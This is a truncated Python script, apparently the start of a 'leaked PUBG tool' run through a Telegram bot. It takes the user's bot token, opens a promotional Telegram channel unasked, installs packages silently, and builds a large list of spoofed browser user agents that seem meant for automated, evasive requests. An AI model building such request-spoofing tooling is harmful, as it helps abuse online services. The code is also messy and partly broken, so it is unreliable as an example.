import webbrowser

import os,requests,sys
print(('\x1b[38;5;48m—'*40)+'\n•  •  تسريب اداه ببجي \n'+('—'*40))
import webbrowser
from sys import stdout
import colorama
import urllib.request as urllib
from time import sleep
import pyfiglet
import os
import sys
import threading
from rich.table import Table
from rich.console import Console
import random
import requests
import time
from uuid import uuid4
uid = uuid4()
O = '\x1b[38;5;208m'
R = '\x1b[1;31m'
X = '\x1b[1;33m'
F = '\x1b[2;32m'
C = '\x1b[1;97m'
B = '\x1b[2;36m'
K = '\x1b[2;35m'
B = '\x1b[2;36m'
E = '\x1b[1;31m'
Z = '\x1b[1;31m'
R = '\x1b[1;31m'
X = '\x1b[1;33m'
F = '\x1b[2;32m'
C = '\x1b[1;97m'
B = '\x1b[2;36m'
Y = '\x1b[1;34m'
E = '\x1b[1;31m'
B = '\x1b[2;36m'
G = '\x1b[1;32m'
S = '\x1b[1;33m'
C1 = '\x1b[2;35m'
G = '\x1b[1;35m'
Z = '\x1b[1;31m'
X = '\x1b[1;33m'
Z1 = '\x1b[2;31m'
F = '\x1b[2;32m'
A = '\x1b[2;34m'
C = '\x1b[2;35m'
B = '\x1b[2;36m'
Y = '\x1b[1;34m'
M = '\x1b[1;37m'
S = '\x1b[1;33m'
U = '\x1b[1;37m'
BRed = '\x1b[1;31m'
BGreen = '\x1b[1;32m'
BYellow = '\x1b[1;33m'
BBlue = '\x1b[1;34m'
BPurple = '\x1b[1;35m'
BCyan = '\x1b[1;36m'
BWhite = '\x1b[1;37m'
os.system('clear')
webbrowser.open('https://t.me/T_T_T_1234_T')
print('')
import os
try:
 from cfonts import render, say
except:
 os.system('pip install python-cfonts')
output = render('ELKAYOOT', colors=['red', 'yellow'], align='center')
print(('\033[92m'*60)+'\n\33[0;41m\033[0;92m\n'+('—'*60))
print(output)
import os,sys,json,uuid,string,random,requests
from concurrent.futures import ThreadPoolExecutor
print(('\033[92m—'*60)+'\n\33[0;41m\033[0;92m\n'+(''*60))
import requests , sys , os , threading , random , rich, uuid, time
from rich.panel import Panel as nel
from rich import print as cetak
from uuid import uuid4
from random import randrange 
P = '\x1b[1;97m'
H = '\x1b[1;92m'
R = '\033[1;31;40m'
X = '\033[1;33;40m' 
F = '\033[1;32;40m' 
C = "\033[1;97;40m" 
C = "\033[1;97;40m"
B = '\033[1;36;40m'
K = '\033[1;35;40m'
V = '\033[1;36;40m'
Bes_Red = '\033[1;31m'
Bes_Yell = '\033[1;33m'
Bes_Green = '\033[1;32m' 
Bes_Bl = '\033[1;34m'
Bes_White = '\033[0;97m'

Z1 = '\033[1;31m' #احمر
X = '\033[1;33m' #اصفر
F1 = '\033[2;32m' #اخضر
GG = '\033[2;32m' #اخضر
PP = '\033[2;35m' #وردي
B1 = '\033[2;36m'#سمائي
W = "\033[1;97m" #ابيض
#— — — — — — — — — — — — —
E = '\033[1;31m'
Y = '\033[1;33m'
Z = '\033[1;31m' #احمر
X = '\033[1;33m' #اصفر
Z1 = '\033[2;31m' #احمر ثاني
F = '\033[2;32m' #اخضر
A = '\033[2;34m'#اورق
C = '\033[2;35m' #وردي
S = '\033[2;36m'#سمائي
G = '\033[1;34m' #ازرق فاتح
HH='\033[1;34m' #ازرق فاتح
M = '\x1b[1;37m'#ابیض
W1 = '\x1b[1;97m'
W2 = '\x1b[38;5;120m'
W3 = '\x1b[38;5;204m'
W4 = '\x1b[38;5;150m'
W5 = '\x1b[1;33m'
W6 = '\x1b[1;31m'
W7 = "\033[1;33m"
W8 = '\x1b[2;36m'
W8 = f'\x1b[38;5;117m'
W9 = "\033[1m\033[34m"
#— — — — — — — — — — — — —
GE,BE,GI,BI=0,0,0,0
#— — — — — — — — — — — — —
import datetime
import pytz
import os
import time
from user_agent import generate_user_agent
from uuid import uuid4
uid = uuid4()
print('''\033[2;32m
''')
from os import path
from urllib.request import urlopen
import os,base64,zlib,pip,urllib,platform,math,shutil,random,uuid,string,hashlib,json,sys
import os, platform, time, sys
import requests,time,datetime
now = datetime.datetime.today()
now = datetime.datetime.today()
mm = str(now.month)
dd = str(now.day)
yyyy = str(now.year)
hour = str(now.hour)
mi = str(now.minute)
ss = str(now.second)
t=(mm + "/" + dd + "/" + yyyy + " " + hour + ":" + mi + ":" + ss)
hours = (now.hour)
x = datetime.datetime.now()
import requests
respo = requests.get(f"https://mail.google.com")
der=respo.headers
print(der['Date'])
import os
try:
    import uuid
except:
    os.system('pip install uuid')

try:
    from random import *
except:
	os.systeam('pip install random')

try:
    import string
except:
    os.system('pip install string')

try:
    import requests
except:
    os.system('pip install requests ')

try:
    from user_agent import generate_user_agent
except:
    os.system('pip install user_agent ')

try:
    from datetime import datetime
except:
    os.system('pip install datetime ')

try:
    import time
except:
    os.system('pip install time')
else:
    os.system('clear')
print('')
print(W+' '*1+GG+''*1+W+' '*1+GG+''*1+W+' '*1+GG+''*1+W+''*1+Z1+''*1+W+''*1+GG+''*1+W+''*1+GG+''*1+W+' '*1)
print(output)
print(f'{F} ادخل توكن بوتك : ')
token=input(f'{Z} TOKEN : {F}')

print(f'{F} ادخل ايدي حسابك : ')
ID=input(f'{Z} ID : {F}')
webbrowser.open('https://t.me/T_T_T_1234_T')
image_url = "https://t.me/c/2625457817/7"
send_photo_url = f"https://api.telegram.org/bot{token}/sendPhoto"

data = {
    "chat_id": ID,
    "photo": image_url,
    "caption": """
- 𝑶𝒘𝒏𝒆𝒓'𝒔 𝑷𝒓𝒐𝒇𝒊𝒍𝒆 🏅:

» 𝑵𝒂𝒎𝒆: ELKAYOOT 
» 𝑼𝒔𝒆𝒓𝒏𝒂𝒎𝒆: @elkayootelasly
»  . @T_T_T_1234_T

- 𝑺𝒆𝒆 𝒘𝒉𝒐 ??𝒆𝒂𝒅𝒔 𝒚𝒐𝒖𝒓 𝒈𝒓𝒐𝒖𝒑 👑.   
    """
}

response = requests.post(send_photo_url, data=data)

if response.status_code == 200:
	os.system('clear')
print('')
import datetime
    
W = '\033[97;1m' 
R = '\033[91;1m' 
G = '\033[92;1m' 
Y = '\033[93;1m' 
B = '\033[94;1m'
P = '\033[95;1m'
C = '\033[96;1m'
N = '\x1b[0m' 
import os
try:
	import requests
except ImportError:
	os.system("pip install requests") 
try:
	import concurrent.futures
except ImportError:
	os.system("pip install futures") 
import os
import sys
import time
import requests
import random
import platform
import base64
import subprocess
from concurrent.futures import ThreadPoolExecutor
import requests,bs4,uuid,json,os,sys,random,datetime,time,re,subprocess
try:
	import rich
except ImportError:
	os.system('pip install rich')
	try:
		import rich
	except ImportError:
		exit(' [×] Cant Install Rich Module, Try Manual Install (pip install rich)')
from rich.table import Table as me
from rich.console import Console as sol
from bs4 import BeautifulSoup as sop
from concurrent.futures import ThreadPoolExecutor as tred
from rich.console import Group as gp
from rich.panel import Panel as nel
import base64
from rich import print as cetak
from rich.markdown import Markdown as mark
from rich.columns import Columns as col
from urllib.parse import quote
ugen2 = [
    'Mozilla/5.0 (Android 2.2; id-id; HTC Desire)/GoBrowser',
    'Mozilla/5.0 (Android 2.2; id-id; HTC Desire)/GoBrowser']
ugen = [
    'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Safari/537.36',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0)',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.101 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Safari/537.36',
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (X11; Linux i686; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:51.0) Gecko/20100101 Firefox/51.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:51.0) Gecko/20100101 Firefox/51.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.114 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0',
    'Mozilla/5.0 (Windows NT 6.2; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Mozilla/5.0 (X11; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.101 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.127 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.117 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:47.0) Gecko/20100101 Firefox/47.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.96 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/5.0)',
    'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/5.0)',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2789.89 Safari/537.36',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.3; Trident/6.0)',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Safari/537.36',
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.96 Safari/537.36',
    'Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.127 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:47.0) Gecko/20100101 Firefox/47.0',
    'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0',
    ' Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (Windows NT 10.0; rv:51.0) Gecko/20100101 Firefox/51.0',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Safari/537.36',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.127 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:51.0) Gecko/20100101 Firefox/51.0',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36',
    'Mozilla/5.0 (Windows NT 5.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36',
    'Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',
    'Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Mozilla/5.0 (Windows NT 5.1; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Mozilla/5.0 (Windows NT 6.3; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:51.0) Gecko/20100101 Firefox/51.0',
    'Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
    'Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0',
    'Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (X11; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.4199.12 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.3420.71 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.4955.44 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3963.46 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.2124.92 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.3081.75 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.2282.73 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.3316.74 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2076.73 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4244.53 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.4516.82 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.2566.13 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.2255.56 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.2451.33 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3241.93 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.4109.30 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.2206.71 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3521.74 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.2337.24 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3351.28 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.3884.36 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.3134.54 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2079.37 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.4115.21 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.4014.60 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.4594.91 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.2875.56 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3473.12 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.2384.48 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4328.46 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.2059.10 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.2960.88 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.3259.92 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.2450.26 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3210.27 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3570.52 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2559.27 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.4808.36 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.2680.94 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.3826.25 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.3921.74 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.4363.72 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.3099.22 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.4233.98 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4605.87 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4445.29 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3761.34 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.4987.74 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.3338.40 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.4811.48 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.4736.94 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.4777.11 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2590.89 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4946.26 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.4865.43 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.3565.70 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.2014.15 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2687.53 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3892.12 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.4988.76 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2975.91 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.4986.97 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.2113.66 Safari/537.36',
